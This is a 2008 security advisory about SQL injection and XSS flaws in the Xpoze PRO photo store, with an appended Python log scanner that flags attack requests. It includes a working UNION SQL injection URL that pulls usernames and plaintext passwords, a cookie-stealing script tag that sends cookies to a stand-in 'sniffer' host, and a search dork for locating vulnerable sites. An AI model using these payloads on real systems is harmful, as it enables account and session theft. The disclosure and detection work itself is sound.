Computer Security
[EN] securityvulns.ru
From: Noname Noname <corwin88_(at)_mail.ru>
Date: 04.07.2008
Subject: Xpoz SQL-INJECTION, XSS.

Xpoz SQL-INJECTION, XSS.

Application: Xpoz PRO (Expoze Photo Store)
------------

Website: http://xpoze.org
--------

Version: All (current 1.0)
--------

About:
------
Xpoze is a photo store that is very easy to use, yet has lots of features to help buyers and sellers find or sell images according to their needs.

Googledork: Powered by Powered by Xpoze.org
-----------

Date: 01-07-2008
-----

Description:
------------
Multiple SQL injection vulnerabilities, plus active and passive XSS.

[ SQL-INJECTION ]

http://host/home.html?menu=1[SQL]
http://host/user.html?uid=1[SQL]
http://host/account/admin/edite.html?eid=1[SQL]

and others...

===>>> Exploit:

http://host/user.html?uid=-1%20union%20select%201,user,1,1,1,pass,1,
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1%20from%20users%20limit%203,1/*

(!) The password is stored in the database in plaintext (!)

[ ACTIVE XSS ]

The forum does not filter the topic and message fields.

===>>> Exploit:

<script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>

[ PASSIVE XSS :) ]

http://host/?tpl=[XSS]
http://host/home.html?title=on&description=on&photo=on&keywords=[XSS]

and

PHPInfo - http://host/phpinfo.php


...by Corwin...
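
A defender-side check for the SQL injection points listed in the advisory above, added here as an example and not part of the original post or of Xpoze itself: it scans web access logs for requests to the three listed pages whose id parameter is not a plain integer. The log format, the sample log lines, and the function and variable names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Pages and id parameters taken from the advisory's SQL injection list.
# Assumption: the application is installed at the web root, as in the advisory URLs.
NUMERIC_PARAMS = {
    "/home.html": "menu",
    "/user.html": "uid",
    "/account/admin/edite.html": "eid",
}

# Assumption: common/combined log format with the request line in double quotes.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PLAIN_INT_RE = re.compile(r"[0-9]{1,10}")

def suspicious_requests(log_lines):
    """Return (line_no, path, param, decoded_value) for every request whose
    id parameter is anything other than a short run of ASCII digits."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        param = NUMERIC_PARAMS.get(url.path)
        if param is None:
            continue  # not one of the pages named in the advisory
        # parse_qs percent-decodes, so %20, %27 and + are normalised before the check.
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        for value in values:
            if not PLAIN_INT_RE.fullmatch(value):
                hits.append((line_no, url.path, param, value))
    return hits

# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2008:10:00:01 +0000] "GET /user.html?uid=7 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jul/2008:10:00:09 +0000] "GET /user.html?uid=-1%20union%20select%201 HTTP/1.1" 200 4811',
    '192.0.2.44 - - [01/Jul/2008:10:00:12 +0000] "GET /home.html?menu=1%27 HTTP/1.1" 500 312',
    '192.0.2.10 - - [01/Jul/2008:10:00:20 +0000] "GET /index.html?uid=abc HTTP/1.1" 404 0',
    '192.0.2.10 - - [01/Jul/2008:10:00:31 +0000] "GET /account/admin/edite.html?eid=12 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The same allow-list (digits only) is the server-side validation these parameters need, in addition to parameterized queries.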
